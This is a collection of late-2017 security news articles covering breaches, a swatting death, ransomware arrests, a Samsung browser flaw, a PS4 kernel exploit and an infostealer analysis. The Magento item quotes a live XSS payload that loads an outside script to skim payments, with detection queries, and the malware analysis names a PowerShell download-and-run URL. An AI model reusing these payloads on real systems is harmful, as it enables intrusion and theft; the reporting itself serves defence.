The Anonymity on WeChat is not possible, China has phased in a real-name registration requirement for mobile phone numbers since 2013, and every account is associated with a mobile phone number.

WeChat

The ID programme was developed by the research institute of the Ministry of Public Security in collaboration with the Tencent’s WeChat team. Several banks in the country and many government departments have provided their support to the project.

The project aims to deter online identity theft, the system relies upon a facial recognition technology to verify applicants before their virtual ID cards get authorized.

The ID cards are available in “lightweight” format to provide a simple proof of identity while accessing services, and the “upgraded” format where more information is requested, for example, while requiring business registration.

Privacy advocates have raised concerns about the program because this public-private partnership could allow the Government to intensify it extensive surveillance and censorship activities.


A new Facebook security feature reveals fraudulent Facebook-like mails
1.1.2018 securityaffairs
Social

A new Facebook security feature protects users from identity theft, the tech giant is taking note of every email it has “recently” sent to its users.
Facebook has rolled out a new security feature to protect users from identity theft, the tech giant is taking note of every email it has “recently” sent to its users.

The full list of email sent by Facebook is available under the Settings menu on the social network platform.

Facebook users that will receive a message allegedly sent by the social network giant can check its authenticity by viewing the new “See recent emails from Facebook” section at the bottom of the Security and Login page.

Facebook%20security%20feature

If the message is not included in the list it is fraudulent and must be discarded.

“Facebookmail.com is a common domain that Facebook uses to send notifications when we detect an attempt to log in to your account or change a password. If you’re unsure if an email you received was from Facebook, you can check its legitimacy by visiting facebook.com/settings to view a list of security-related emails that have been recently sent.” states the announcement published by Facebook.

Even if threat actors are able to disguise emails, to make them look like official messages sent by Facebook, the new Facebook security feature will help users to identify phishing attacks.

Crooks use phishing attacks to obtain victim’s credentials, access their profile, and perform a wide range of fraudulent activities.

Compromised accounts could be used to send out phishing messages or to spread malware.

Users that will discover email scam pretending to be sent from the Facebook platform can report it to phish@facebook.com.

If your account has been compromised due to a phishing attempt, visit facebook.com/hacked.

“If you’ve checked this tool and determined that an email you received is fake, we encourage you to report it to phish@facebook.com, and if you believe your account has been compromised due to a phishing attempt, you may attempt to regain access to your account at: facebook.com/hacked. ” concludes Facebook.


Critical "Same Origin Policy" Bypass Flaw Found in Samsung Android Browser
30.12.2017 thehackernews Android

A critical vulnerability has been discovered in the browser app comes pre-installed on hundreds of millions of Samsung Android devices that could allow an attacker to steal data from browser tabs if the user visits an attacker-controlled site.
Identified as CVE-2017-17692, the vulnerability is Same Origin Policy (SOP) bypass issue that resides in the popular Samsung Internet Browser version 5.4.02.3 and earlier.
The Same Origin Policy or SOP is a security feature applied in modern browsers that is designed to make it possible for web pages from the same website to interact while preventing unrelated sites from interfering with each other.
In other words, the SOP makes sure that the JavaScript code from one origin should not be able to access the properties of a website on another origin.

 

The SOP bypass vulnerability in the Samsung Internet Browser, discovered by Dhiraj Mishra, could allow a malicious website to steal data, such as passwords or cookies, from the sites opened by the victim in different tabs.
"When the Samsung Internet browser opens a new tab in a given domain (say, google.com) through a Javascript action, that Javascript can come in after the fact and rewrite the contents of that page with whatever it wants," researchers from security firm Rapid7 explained.
"This is a no-no in browser design since it means that Javascript can violate the Same-Origin Policy, and can direct Javascript actions from one site (controlled by the attacker) to act in the context of another site (the one the attacker is interested in). Essentially, the attacker can insert custom Javascript into any domain, provided the victim user visits the attacker-controlled web page first."
Attackers can even snag a copy of your session cookie or hijack your session and read and write webmail on your behalf.
Mishra reported the vulnerability to Samsung, and the company replied that "the patch is already preloaded in our upcoming model Galaxy Note 8, and the application will be updated via Apps store update in October."
Meanwhile, Mishra, with the help of Tod Beardsley and Jeffrey Martin from Rapid7 team, also released an exploit for Metasploit Framework.
Rapid7 researchers have also published a video demonstrating the attack.
Since the Metasploit exploit code for the SOP bypass vulnerability in the Samsung Internet Browser is now publicly available, anyone with less technical knowledge can use and exploit the flaw on a large number of Samsung devices, most of which are still using the old Android Stock browser.


CEO of Major UK-Based Cryptocurrency Exchange Kidnapped in Ukraine
30.12.2017 thehackernews Cyber

Pavel Lerner, a prominent Russian blockchain expert and known managing director of one of the major crypto-exchanges EXMO, has allegedly been kidnapped by "unknown" criminals in the Ukranian capital of Kiev.
According to Ukraine-based web publication Strana, Lerner, 40-year-old citizen of Russia, was kidnapped on December 26 when he was leaving his office in the center of town (located on the Stepan Bandera Avenue).
Unknown kidnappers in dark clothes and balaclavas dragged Lerner in their black Mercedes-Benz Vito brand (state number AA 2063 MT) car and drove away in an unknown direction.
The information comes from an anonymous source in Ukrainian law enforcement agencies, though multiple investigations are currently underway to find out why and by whom Lerner was kidnapped.
Lerner is a recognized IT specialist in Ukraine who led a number of startups related to blockchain technology development and mining operations.
Lerner is also the managing director of EXMO, a major UK-based cryptocurrency exchange founded in 2013 and well-known with Russians for accepting ruble payments.
Law enforcers in Kiev have begun an investigation and are currently conducting search operation, working out all possible leads in the case which is described as the kidnapping.
EXMO's representatives confirmed media reports in a statement to a local crypto journal BitNovosti and appealed for any information that could lead to the finding of Lerner.
The company representatives also assured its customers that EXMO operations were not affected by the incident and that Lerner did not have direct access to any cryptocurrency account or other personal data.
"We are doing everything possible to speed up the search of Pavel Lerner. Any information regarding his whereabouts is very much appreciated," PR-department of EXMO said.
"Despite the situation, the exchange is working as usual. We also want to stress that nature of Pavel’s job at EXMO doesn’t assume access either to storages or any personal data of users. All users funds are absolutely safe."
Lerner case has been considered to be yet another case involving a Russian national with cryptocurrency background.
In July this year, Alexander Vinnik, a 38-year-old Russian citizen and operator of cryptocurrency exchange BTC-e, was detained in Northern Greece at the request of US law enforcement authorities. The Greece court in October also ruled to extradite Vinnik to the United States.
The US authorities accused Vinnik of crimes related to the hack of Mt. Gox, which was shut down in 2014 following a massive series of mysterious robberies, which totaled at least $375 million in Bitcoin.


Two Romanians Charged With Hacking Police CCTV Cameras Before Trump Inauguration
30.12.2017 thehackernews Crime

Remember how some cybercriminals shut down most of Washington D.C. police's security cameras for four days ahead of President Donald Trump's inauguration earlier this year?
Just a few days after the incident, British authorities arrested two people in the United Kingdom, identified as a British man and a Swedish woman, both 50-year-old, on request of U.S. officials.
But now US federal court affidavit has revealed that two Romanian nationals were behind the attack that hacked into 70% of the computers that control Washington DC Metropolitan Police Department's surveillance camera network in January this year, CNN reports.
The two suspects—Mihai Alexandru Isvanca, 25, and Eveline Cismaru, 28—were arrested in Bucharest on December 15 on charges of conspiracy to commit wire fraud and various forms of computer fraud.
According to the criminal complaint unsealed in Washington, the pair hacked 123 of the Metropolitan Police Department's 187 outdoor surveillance cameras used to monitor public areas in D.C. by infecting computers with ransomware in an effort to extort money.
Ransomware is an infamous piece of malicious software that has been known for locking up computer files and then demanding a ransom (usually in Bitcoins) to help victims unlock their files.
The cyber attack occurred just days before the inauguration of President Donald Trump and lasted for almost four days, eventually leaving the CCTV cameras out of recording anything between 12 and 15 January 2017.
Instead of fulfilling ransom demands, the DC police department took the storage devices offline, removed the infection and rebooted the systems across the city, ensuring that the surveillance camera system was secure and fully operational.
"This case was of the highest priority due to its impact on the Secret Service’s protective mission and its potential effect on the security plan for the 2017 Presidential Inauguration," the Justice Department said.
"The investigation revealed no evidence that any person’s physical security was threatened or harmed due to the disruption of the MPD surveillance cameras."
The affidavit, dated December 11, mentions the defendants used two types of cryptocurrency ransomware variants—Cerber and Dharma. Other evidence also revealed a scheme to distribute ransomware by email to at least 179,000 email addresses.
"According to the complaint, further investigation showed that the two defendants, Isvanca and Cismaru, participated in the ransomware scheme using the compromised MPD surveillance camera computers, among others," the Justice Department said.
"The investigation also identified certain victims who had received the ransomware or whose servers had been accessed during the scheme."
However, it is still unclear whether the pair arrested was solely behind the attack or were part of a more comprehensive cybercriminal network.
While Isvanca remains in custody in Romania, Cismaru is under house arrest pending further legal proceedings, according to the Justice Department.
If extradited and convicted, the Romanian defendants could face a maximum of 20 years in prison.


It’s a mystery, member of the Lurk gang admits creation of WannaCry ransomware for intelligence agencies
30.12.2017 securityaffairs
Ransomware

A hacker belonging to the Lurk cybercrime gang admits the creation of WannaCry ransomware and DNC hack on request of intelligence agencies.
In an interview to Dozhd TV channel, one of the members of the Lurk crime group arrested in the Russian city of Ekaterinburg, Konstantin Kozlovsky, told that he was one of the authors of the dreaded WannaCry ransomware and that the job was commissioned by intelligence agencies.

kozlovskii_%20wannacry

The Lurk cybercrime gang was known in the criminal ecosystem because it developed, maintained and rent the infamous Angler Exploit Kit. A joint investigation conducted by the Russian Police and the Kaspersky Lab allowed the identification of the individuals behind the Lurk malware. The members of the Lurk cybercrime crew were arrested by Russian law enforcement in the summer of 2016.

Law enforcement arrested the suspects in June, authorities accused them of stealing around $45 million USD from Russian financial institutions by using the Lurk banking trojan.

According to the Cisco Talos researchers, after the arrests of the individuals behind the Lurk banking trojan, it has been observed a rapid disappearance of the Angler EK in the wild.

According to Kozlovsky, WannaCry was developed to target corporate networks and rapidly spread by infecting the larger number of machines. The intent was to paralyze the activities of the target organization with just ‘one button.’

“The virus was tested on computers of the Samolet Development company which is engaged in construction of housing in Moscow area. Also hackers planned to hack a network of Novolipetsk Steel and to try to stop its blast furnaces.” reported the Russian Website crimerussia.com.

Konstantin Kozlovsky, that is now being held in a pre-trial detention center, already admitted to have worked for intelligence agencies.

Earlier the hacker told that cracked servers of the Democratic party of the USA and e-mail of Hillary Clinton for the Russian Intelligence Agency FSB.

Kozlovsky explained that the actions were coordinated by Dmitry Dokuchaev from the Center of Information Security of the FSB. Dmitry Dokuchaev is one of the two Russian intelligence officers (Dmitry Dokuchaev and Igor Sushchin) charged in March by the US Justice Department along with hackers Alexsey Belan and Karim Baratov for breaking into Yahoo servers in 2014.

Dokuchaev through his lawyer denied knowing Kozlovsky.

The Kozlovsky’s story is quite strange, he is currently under the custody of Russian authorities and anyway continues to accuse the FSB also of other hacks. Is this a new disinformation campaign? Who and why is orchestraing it?

In December, the US Government attributes the massive attack Wannacry to North Korea.

The news of the attribution was first reported by The Wall Street Journal, according to the US Government, the WannaCry attack infected millions of computers worldwide in May is an act of Information Warfare.

WannaCry infected 200,000 computers across 150 countries in a matter of hours last week, it took advantage of a tool named “Eternal Blue”, originally created by the NSA, which exploited a vulnerability present inside the earlier versions of Microsoft Windows. This tool was soon stolen by a hacking group named “Shadow Brokers” which leaked it to the world in April 2017.

wannacry%20ransomware%20medical%20devices

WannaCry ransomware on a Bayer radiology system – Source Forbes


Chinese censorship – authorities have shut down 13,000 websites since 2015
30.12.2017 securityaffairs BigBrothers

China continues to strengthen its online censorship, it has shut down or revoked the licenses of 13,000 websites since 2015 for violating the country’s internet rules.
State media also reported that service providers have closed nearly 10 million internet accounts for “violating service protocol.”

“These moves have a powerful deterrent effect,” Xinhua quoted Wang Shengjun, vice chairman of the Standing Committee of the National People’s Congress (NPC), as saying.

Chinese authorities have summoned more than 2,200 websites operators since 2015. According to Xinhua more than 10 million people who refused to register using their real names had internet or other telecoms accounts suspended over the past five years.

Within China, websites must register with authorities and are responsible for “ensuring the legality of any information” that is published on them.

These data confirm the strict control powered by China on the digital lives of its citizens.

According to Freedom House, China is the country with the most restrictive online use policies.


The new Chinese cyber security law gives more power to the Government and enforces new rules especially for those companies that produce software that could be used to circumvent the country’s censorship.

The Great Firewall project already blocked access to more hundreds of the world’s 1,000 top websites, including Google, Facebook, Twitter, and Dropbox.

Recently the Chinese authorities have sentenced a man to five-and-a-half years in prison for selling a VPN service without the authorization.

Since early this year, the Chinese authorities started banning “unauthorized” VPN services, any company offering such type of service in the country must obtain an appropriate license from the government.

People resident in the country make use of VPN and Proxy services to bypass the censorship implemented by the Great Firewall and access website prohibited by the Government without revealing their actual identity.


A 28-year-old Kansas man was shot and killed by police in a swatting attack
30.12.2017 securityaffairs Hacking

Andrew Finch, a 28-year-old man from Wichita, Kansas, was killed last week in a swatting attack by police who were responding to a call reporting a hostage situation at the man’s house.
All begun on the evening of December 28, two gamers bet they could complete the Call of Duty game by ‘swatting’ each other, but one of them gave the wrong address to a nearby known swatter.

“The two CoD players reportedly got into an argument over a small money loss on UMG’s wager platform online (view match) and threatened to swat each other, with one of the players sending the other incorrect details of an address nearby to a known swatter, who was reportedly responsible for the CWL Dallas bomb hoax evacuations.” reported the website Dexerto.

29 Dec

Christopher Duarte

@Parasite
Unbelievable, two kids in the community got in a verbal dispute and thought it would be funny to swat each other which resulted in an innocent man being killed by police officers responding to the swat calling. Disgusted.


Christopher Duarte

@Parasite
pic.twitter.com/ZCTqzucWwnhttp://www.kansas.com/news/local/crime/article192081124.html …

5:29 AM - Dec 29, 2017
View image on TwitterView image on Twitter
47 47 Replies 191 191 Retweets 347 347 likes
Twitter Ads info and privacy
Yes, you heard right, the absurd death was the result of a “swatting” attack gone wrong.

According to the popular expert Brian Krebs, the dispute originated on Twitter, one of the parties allegedly using the Twitter handle “SWauTistic” threatened to swat another user who handles the account “7aLeNT“. @7aLeNT dared someone to swat him, but then tweeted an address that was not his own.

“Swautistic responded by falsely reporting to the Kansas police a domestic dispute at the address 7aLenT posted, telling the authorities that one person had already been murdered there and that several family members were being held hostage.” wrote Krebs.

“Not long after that, Swautistic was back on Twitter saying he could see on television that the police had fallen for his swatting attack. When it became apparent that a man had been killed as a result of the swatting, Swautistic tweeted that he didn’t get anyone killed because he didn’t pull the trigger (see image above).

Swautistic soon changed his Twitter handle to @GoredTutor36, but KrebsOnSecurity managed to obtain several weeks’ worth of tweets from Swautistic before his account was renamed. Those tweets indicate that Swautistic is a serial swatter — meaning he has claimed responsibility for a number of other recent false reports to the police.”

Kansas%20Swatting

“I heard my son scream, I got up, and then I heard a shot,” said Lisa Finch, the mother of the shooting victim, in a video interview with the Wichita Eagle.

Police then handcuffed Lisa Finch and took her outside, along with “my roommate and my granddaughter, who witnessed the shooting and had to step over her dying uncle’s body.”

Andrew was unarmed and the police did not find any weapon in the house.

A typical “Swatting” scenario sees someone calls police from the target’s home and describes a fake emergency situation urging the intervention of the law enforcement. This is what has happened at the Finch’s house.

“We were told that someone had an argument with their mother, and dad was accidentally shot and that now that person was holding brother, sister, and mother hostage,” a police official told reporters.

According to the official, Andrew Finch “came to the front door” and “one of our officers discharged his weapon,” killing the man, but he declined to explain why the agent opened the fire.

To be clear, Andrew Finch was not a Call of Duty player and he was no linked with the two gamers.

The police are investigating the case to track the person who called them first reporting the fake emergency.

The recording of the call to 911 operators that prompted this tragedy can be heard at this link.

Swatting is a serious problem, a member of Congress has proposed legislation to combat this illegal practice.

Back in 2013, the popular expert Brian Krebs was the victim of a swatting attack, fortunately with a happy ending.


Samsung Android Browser is affected by a critical SOP bypass issue, a Metasploit exploit code is available
30.12.2017 securityaffairs Android

The browser app pre-installed on Samsung Android devices is affected by a critical SOP bypass issue, tracked as CVE-2017-17692.
The browser app pre-installed on Android devices is affected by a critical flaw, tracked as CVE-2017-17692, that could be exploited by an attacker to steal data from browser tabs if the user visits an attacker-controlled site.

The SOP bypass issue in the Samsung Internet Browser was discovered by the security researcher Dhiraj Mishra.

The CVE-2017-17692 vulnerability is a Same Origin Policy (SOP) bypass issue that affects the Samsung Internet Browser version 5.4.02.3 and earlier.
Samsung%20SOP%20bypass%20issue
The Same Origin Policy is one of the most important security mechanisms implemented in modern browsers, the basic idea behind the SOP is the javaScript from one origin should not be able to access the properties of a website on another origin.

A SOP bypass occurs when a sitea.com is somehow able to access the properties of siteb.com such as cookies, location, response etc.

An attacker can copy victim’s session cookie or hijack his session and read and write webmail on your behalf.

Mishra developed a Metasploit Module for the exploitation of the SOP bypass issue and reported the flaw to the MITRE to assign CVE.

Mishra also reported the flaw to Samsung, who acknowledged it and confirmed that “the patch is already preloaded in our upcoming model Galaxy Note 8, and the application will be updated via Apps store update in October.“

Here is the Source Code for Bypassing Same Origin Policy in Samsung Internet Browser in Metasploit,

“When the Samsung Internet browser opens a new tab in a given domain (say, google.com) through a Javascript action, that Javascript can come in after the fact and rewrite the contents of that page with whatever it wants,” reads a blog post published by researchers from security firm Rapid7.

“This is a no-no in browser design since it means that Javascript can violate the Same-Origin Policy, and can direct Javascript actions from one site (controlled by the attacker) to act in the context of another site (the one the attacker is interested in). Essentially, the attacker can insert custom Javascript into any domain, provided the victim user visits the attacker-controlled web page first.”

The experts from Rapid7 have also published a video PoC of the attack.


The availability online of the Metasploit exploit code pose a serious risk to Android users that are still using the old Android Stock browser.


A Kernel Exploit for Sony PS4 Firmware 4.05 is available online
30.12.2017 securityaffairs
Exploit

The developer SpecterDev finally released a fully-functional kernel exploit for PlayStation 4 (firmware 4.05) dubbed ‘namedobj’.
Good news for PlayStation gamers, the developer SpecterDev finally released a fully-functional kernel exploit for PlayStation 4 (firmware 4.05) dubbed ‘namedobj’.

PS4 gamers who are running firmware version lower than 4.05 need to update their gaming console to trigger the exploit.

The Kernel exploit was released two months after Team Fail0verflow revealed the technical details about the first PS4 Kernel Exploit.

The kernel exploit ‘namedobj’ is now available on Github, it works for the PlayStation 4 on 4.05FW and allows users to run arbitrary code on the device.

“In this project you will find a full implementation of the “namedobj” kernel exploit for the PlayStation 4 on 4.05. It will allow you to run arbitrary code as kernel, to allow jailbreaking and kernel-level modifications to the system. This release however, does not contain any code related to defeating anti-piracy mechanisms or running homebrew. This exploit does include a loader that listens for payloads on port 9020 and will execute them upon receival.” reads the description published on GitHub.

PS4%20Kernel%20Exploit

The availability of the kernel exploit could allow developers to write a working jailbreak and kernel-level modifications to the system.

Jailbreaking allows removing hardware restrictions implemented by the operating system, it allows users to run custom code on the console and install mods, games, and third-party applications bypassing the anti-piracy mechanisms implemented by Sony.

“This release, however, does not contain any code related to defeating anti-piracy mechanisms or running homebrew,” SpecterDev said.

“This exploit does include a loader that listens for payloads on port 9020 and will execute them upon receival.”

Reading the “Notes” we can notice that the developer warns that the exploit should not work for some users.

“This exploit is actually incredibly stable at around 95% in my tests. WebKit very rarely crashes and the same is true with kernel. I’ve built in a patch so the kernel exploit will only run once on the system. You can still make additional patches via payloads,” SpecterDev warned.

At this point, experts at Sony will work to identify the flaws triggered by the kernel exploit and fix them.


Pavel Lerner, head of EXMO cryptocurrency exchange, was kidnapped in Ukraine
30.12.2017 securityaffairs Cyber

According to Ukrainian media, the head of the EXMO cryptocurrency exchange Pavel Lerner has been kidnapped in Kiev, the police is investigating the case.
According to Ukrainian media, the Russian IT expert Pavel Lerner has been kidnapped in Kiev.

Pavel Lerner (40) is a and managing director EXMO, one of the largest cryptocurrency exchanges, and according to a Ukrainian media Strana.ua he stopped responding to phone calls on December 26.

“According to the applicant in the case, Lerner was abducted near his workplace – an office center in Stepan Bandery Street (before renaming – Moscow Avenue). The programmer was dragged into the car of Mercedes-Benz Vito brand (state number AA 2063 MT) by unknown persons in dark clothes and balaclava, and taken away to an unknown destination.” states the Strana.ua.

Lerner has been kidnapped while he was leaving his office in Stepan Bandera Prospect in Kiev.

The IT specialist led a number of startups, related to blockchain technology and cryptocurrency mining.

Ukrainian police are investigating the case, at the time I was writing it is still unclear who and why kidnapped the man.

EXMO confirmed the news of the kidnapping and clarified that company operations were not affected by what has happened. EXMO also added that Lerner did not have direct access to any cryptocurrency account or other personal data.

“We are doing everything possible to speed up the search of Pavel Lerner. Any information regarding his whereabouts is very much appreciated,” PR-department of EXMO said.

“Despite the situation, the exchange is working as usual. We also want to stress that nature of Pavel’s job at EXMO doesn’t assume access either to storages or any personal data of users. All users funds are absolutely safe.”


The Twitter account of the popular security expert John McAfee was hacked
30.12.2017 securityaffairs
Social

The official Twitter account of popular cyber security expert John McAfee was hacked today, hackers used it to promote alternative cryptocurrencies.
The official Twitter account of legendary security expert John McAfee was hacked today, attackers used it to send several tweets promoting alternative cryptocurrencies like Siacoin, NXT, XRP, PTOY, and BAT.

At the time of writing, there aren’t further info related to the attack, John McAfee explained that its account was protected with a two-factor authentication process.

This suggests that the attackers have found a way to obtain the authentication code sent by Twitter, this is possible by compromising the mobile device or via an SS7 attack.

In this latter scenario, hackers can exploit a flaw in the SS7 protocol to steal the victim’s identity on the messaging services with just basic skills.

The principal instant messaging services, including WhatsApp and Telegram, rely on the SMS authentication as the primary security verification mechanism, which is routed through SS7 signalling. This means that hackers exploit the SS7 to compromise the verification mechanism and take over the victim’s account and impersonate him.

According to McAfee, someone has compromised his smartphone.

28 Dec

Adam Eivy \[._.]/
@antic
Replying to @officialmcafee
So how did it happen? Was this a breach of twitter, of your 2-factor service (e.g. phone provider). Did you not have 2-factor on for some reason? Curious if this is something that could affect others.


John McAfee

@officialmcafee
If it can affect me it can affect anyone. Most likely my phone was compromised

4:40 AM - Dec 28, 2017
24 24 Replies 2 2 Retweets 28 28 likes
Twitter Ads info and privacyJohn McAfee

@officialmcafee
Urgent: My account was hacked. Twitter has been notified. The coin of the day tweet was not me. As you all know... I am not doing a coin of the day anymore!!!!

12:04 AM - Dec 28, 2017
3,922 3,922 Replies 2,726 2,726 Retweets 7,997 7,997 likes
Twitter Ads info and privacy
“The first indication that I had been hacked was turning on my cell phone and seeing the attached image,” he told BBC.


McAfee added that he was on a boat when his account was hacked and for this reason, he was not able to contact the AT&T.
“I knew at that point that my phone had been compromised.” he added

“I was on a boat at the time and could not go to my carrier (AT&T) to have the issue corrected.

“All that the hacker did was compromise my Twitter account. It could have been worse.”

John knows very well that he is a privileged target of several types of attackers, including haters.


John McAfee

@officialmcafee
Though I am a security expert, I have no control over Twitter's security. I have haters. I am a target. People make fake accounts, fake screenshots, fake claims. I am a target for hackers who lost money and blame me. Please take responsibility for yourselves. Adults only please.

4:32 AM - Dec 28, 2017
1,368 1,368 Replies 798 798 Retweets 6,453 6,453 likes
Twitter Ads info and privacy
McAfee’s account was fully restored, Twitter hasn’t commented the incident.
The reality is that is not complex for a persistent attacker to compromise your social media account.


Hackers are attempting to breach Magento stores through the Mirasvit Helpdesk extension
30.12.2017 securityaffairs Hacking

The cybersecurity expert Willem de Groot reported cyber attacks against Magento websites running the popular helpdesk extension ‘Mirasvit Helpdesk.’
de Groot observed attackers sending a message like this to Magento merchants:

Hey, I strongly recommend you to make a redesign! Please contact me if you need a good designer! – knockers@yahoo.com

The message contains a specially crafted sender that triggers an XSS attack.

“Upon closer examination, the message contains a specially crafted sender that contains an XSS attack: an attempt to take control of the backend of a Magento store (archived copy here):”

<script src="https://helpdeskjs.com/jquery.js"></script>@gmail.com
“This exploits a flaw in the popular Mirasvit Helpdesk extension. When a helpdesk agent opens the ticket, it will run the code in the background, in the browser of the agent.” wrote de Groot.

The attack exploits one of the flaws discovered in September 2017 by the researchers at the security firm WebShield that affected all versions of the Mirasvit Helpdesk extension until 1.5.2. The company addressed the issued with the release of the version 1.5.3.

When a helpdesk agent opens the ticket, it will run the code for the XSS attack in the background, then a malicious code is added to the footer of the Magento template. In this way, the attacker is able to get its code executed on any page accessed by visitors. The malware used in the attacks spotted by the expert was designed to intercept payments data and send it offshore as the customer types it into the payment form.

“Ultimately, the malware intercepts payments data and send it offshore as the customer types it into the payment form.” de Groot added.

“This attack is particularly sophisticated, as it is able to bypass many security measures that a merchant might have taken. For example, IP restriction on the backend, strong passwords, 2-Factor-Authentication and using a VPN tunnel will not block this attack.”

Mirasvit%20Helpdesk

de Groot suggested to run the following query on the database to find XSS attacks:

SELECT *
FROM `m_helpdesk_message`
WHERE `customer_email` LIKE '%script%'
OR `customer_name` LIKE '%<script%'
OR `body` LIKE '%<script%' \G
and search access logs for modifications of templates through the backend:

$ grep system_config/save/section/design access.log

The expert also published a copy of the malware on GitHub.

Mirasvit published a blog post warning its customers and urging them to update their installs.


Ancestry.com Responds Well To RootsWeb Data Breach
30.12.2017 securityaffairs Incindent

The popular expert Troy Hunt notified the Ancestry.com security team of an unsecured file on a RootsWeb server containing “email addresses/username and password combinations as well as usernames from a RootsWeb.com server”.
When you think of personal security questions, you might think of your mother’s surname or other family information that normally isn’t shared — unless you are building your family tree with an online genealogy search. When Ancestry.com notifies its users of a potential security breach it sounds worse than most.

Ancestry.com is a company with millions of customers that use their online tools to research their family tree. The company also hosts servers for RootsWeb, a free, community-driven collection of genealogy tools and discussion forums. On December 20th, 2017, Troy Hunt, of HaveIBeenPwned.com, notified the Ancestry.com security team of an unsecured file on a RootsWeb server containing “email addresses/username and password combinations as well as usernames from a RootsWeb.com server”, and a quick and detailed investigation ensued.

website%20Ancestry.com

According to Ancestry.com’s blog post detailing the incident, the security team reviewed the file identified by Hunt, and determined that it does contain login details for 300,000 accounts although they describe, “the majority of the information was old.” They continued their investigation and determined that of the 300,000 accounts, 55,000 had been reused by users on both the RootsWeb and Ancestry websites. Most of the 55,000 were “from free trial, or currently unused accounts,” but 7,000 login credentials were in use by active Ancestry.com users. Ancestry.com supports millions of users so this breach represents less than 1% of their users, however, they still took the potential impacts seriously and acted accordingly.

The internal investigation points to the RootsWeb surname list information service which Ancestry.com retired earlier this year. “We believe the intrusion was limited to the RootsWeb surname list, where someone was able to create the file of older RootsWeb usernames and passwords as a direct result of how part of this open community was set up, an issue we are working to rectify”, according to the blog post by Ancestry.com CISO, Tony Blackman.

He continued with, “We have no reason to believe that any Ancestry systems were compromised. Further, we have not seen any activity indicating the compromise of any individual Ancestry accounts.” According to Ancestry, the RootsWeb servers do not host any credit card or social insurance numbers so the potential impact of this breach appears to be minimized.

The RootsWeb website is currently offline while the Ancestry teams complete their investigation, make the appropriate configuration changes and “ensure all data is saved and preserved to the best of [their] ability.”

In addition, the Ancestry has locked the 55,000 accounts found in the exposed file, requiring users to change their passwords the next time they attempt to log on. They sent emails to all 55,000 email addresses advising them of the incident and recommended actions, and commit to “working with regulators and law enforcement where appropriate.”

To summarize, the Ancestry.com security team responded quickly when notified of a potential breach, determined the potential scope and impact, took swift action to minimize damages, notified impacted users, clearly and publicly described the event. Troy Hunt’s tweet describes it best, “Another data breach from years ago, this time from @Ancestry’s services. Really impressed with the way they handled this: I got in touch with them bang on 72 hours ago and they’ve handled it in an exemplary fashion.”


Troy Hunt

@troyhunt
Another data breach from years ago, this time from one of @Ancestry's services. Really impressed with the way they handled this: I got in touch with them bang on 72 hours ago and they've handled it in an exemplary fashion https://blogs.ancestry.com/ancestry/2017/12/23/rootsweb-security-update/ …


Two Romanians charged with infecting US Capital Police cameras with ransomware early this year
30.12.2017 securityaffairs
Ransomware

Two Romanian people have been arrested and charged with hacking into US Capital Police cameras ahead of the inauguration of President Trump.
Two Romanian people have been arrested and charged with hacking into control systems of the surveillance cameras for the Metropolitan Police Department in the US. The two suspects, Mihai Alexandru Isvanca, 25, and Eveline Cismaru, 28, hacked the US Capital Police cameras earlier this year.

A ransomware infected 70 percent of storage devices used by the Washington DC CCTV systems just eight days before the inauguration of President Donald Trump.

The attack occurred between 12 and 15 January, the ransomware infected 123 of 187 network video recorders, each controlling up to four CCTVs. IT staff was forced to wipe the infected systems in order to restore the situation, fortunately, the ransomware did not affect other components of the Washington DC network.

Capital%20Police%20cameras%20hacked

The first infections were discovered by the Police on Jan. 12 D.C. when the authorities noticed four camera sites were not functioning properly. Experts at the city technology office detected two distinct ransomware (Cerber and Dharma) in four recording devices, then they extended the analysis to the entire surveillance network and wiped all the infected equipment.

The duo was arrested in Bucharest on December 15 and charged with conspiracy and various forms of computer fraud.

According to an affidavit dated December 11, the two criminals acted in an effort “to extort money” in exchange for unlocking the surveillance system.

Prosecutors collected evidence that revealed a scheme to distribute ransomware by email to at least 179,000 email addresses.

“The investigation uncovered information that the MPD surveillance camera computers were compromised between Jan. 9 and Jan. 12, 2017, and that ransomware variants called “cerber” and “dharma” had been stored on the computers. Other evidence in the investigation revealed a scheme to distribute ransomware by email to at least 179,000 email addresses. ” reads the press release published by the DoJ.

Isvanca remains in custody in Romania and Cismaru is under house arrest pending further legal proceedings, the maximum penalty for a conspiracy to commit wire fraud is 20 years in prison.


Info Stealing – The cyber security expert Marco Ramilli spotted a new operation in the wild
30.12.2017 securityaffairs Cyber

The Italia cyber security expert Marco Ramilli, founder of Yoroi, published an interesting analysis of a quite new InfoStealer Malware delivered by eMail to many International Companies.
Attack attribution is always a very hard work. False Flags, Code Reuse and Spaghetti Code makes impossible to assert “This attack belongs to X”. Indeed nowadays makes more sense talking about Attribution Probability rather then Attribution by itself. “This attack belongs to X with 65% of attribution probability” it would be a correct sentence.
I made this quick introduction because the following analysis would probably take the reader to think about specific attribution, but it won’t be so accurate, so please be prepared to have not such a clear conclusions.

Today I’d like to show an interesting analysis of a quite new InfoStealer Malware delivered by eMail to many International Companies. The analysis shows up interesting Code Reuse capabilities, apparently originated by Japanese Attackers reusing an English Speaker Attacker source code. Again I have not enough artifacts to give attributions but only few clues as follows. In the described analysis, the original sample was delivered by sarah@labaire.co.za (with high probability a compromised South Africa account) to one of my spamming email addresses.

The obtained sample is a Microsoft Word document within macro in it. The macros were heavily obfuscated by using four rounds of substitutions and UTF-8 encoding charsets (which, by the way, is super annoying). The following image shows the obfuscated macro code with UTF-8 charsets.
Info%20Stealing
Stage 1: Obfuscation
By using oletools and “tons” of cups of coffee (to be awake until late night to make recursive steps) I finally was able to extract the invoked command, showed in the following image.
Info%20Stealing
Stage 1: Invoked Command
A fashionable powershell command drops and executes: hxxp://ssrdevelopments.co.za/a2/off.exe. Powershell seems to be a “must have” in contemporary Malware. Analyzing the “dropping” url and tracking down the time it is in “Index Of” mode (2017-0-13), I suspect it is not a compromised website rather a crafted web server or a compromised host of a dead company.

Info Stealing
Dropping Web Site
By surfing the Malware propagator website I founded out many malicious executables (sees IoC section) each one showing up specific behaviors such as: password stealers, RAT, and Banking Trojans. Even if the samples were developed for different targets, all of them shared the following basic behaviors:

Check for victims IP address before getting into Malicious activities (maybe related to targeted activities)
Install itself into auto execution path
Tries to fingerprint the target system (such as CPU, HD, Memory, Username, System, etc..)
Sniff for Keystrokes
I’d like to write a simple analysis for each found sample, but today time is not my friend, so let’s focalize to one of the malicious samples. Let’s get done the received sample by digging into the “second stage” dropped by the pPowerShell “first stage” from ssrdevelopments.co.za/a2/off.exe. After few seconds on second stage (off.exe) it became clear that it was a .NET software. By reversing the interpreted .NET language some clear text comments appeared interesting. Japanese language such as comments and variable names came out from static analysis. Let’s have a look to them.

Info%20Stealing
